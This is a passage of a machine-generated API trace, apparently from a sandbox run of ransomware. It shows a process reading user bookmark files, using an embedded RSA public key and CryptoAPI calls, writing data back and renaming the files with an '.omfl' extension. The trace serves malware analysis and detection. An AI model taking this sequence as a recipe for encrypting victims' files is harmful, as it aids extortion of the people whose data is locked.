hHeap=0x4970000) returned 1 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17430 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.395] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e18 [0132.395] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17448 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdbc8 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17418 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17208 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17460 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.396] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.396] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.397] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.397] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.397] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.397] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.397] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.397] CloseHandle (hObject=0x610) returned 1 [0132.400] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.omfl")) returned 1 [0132.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.401] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.402] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.403] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.403] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0132.403] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0132.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.404] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=226) returned 1 [0132.404] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.407] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.407] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.467] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xe2, lpOverlapped=0x0) returned 1 [0132.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.467] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0132.468] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.468] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.468] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.469] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.469] GetLastError () returned 0x0 [0132.469] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.469] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.469] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.469] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.469] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.469] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17448 | out: hHeap=0x4970000) returned 1 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17460 | out: hHeap=0x4970000) returned 1 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0132.469] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0132.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0132.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17460 [0132.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.469] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17448 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdbc8 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e18 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17460 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17448 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.470] GetCurrentThreadId () returned 0x618 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x7579b00 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750ca48 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0132.470] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.470] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.471] GetCurrentThreadId () returned 0x618 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c4e0 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17178 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17448 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0132.471] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0132.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17460 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf168 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17430 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17208 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17478 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd171d8 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17448 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17448 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0132.472] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0132.472] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0132.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75039b8 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd171d8 | out: hHeap=0x4970000) returned 1 [0132.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0132.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0132.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17448 | out: hHeap=0x4970000) returned 1 [0132.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdd06f38 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75039b8 | out: hHeap=0x4970000) returned 1 [0132.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd06f38 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0132.473] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17478 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17208 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf168 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17460 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17430 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17418 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dbbe0 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) 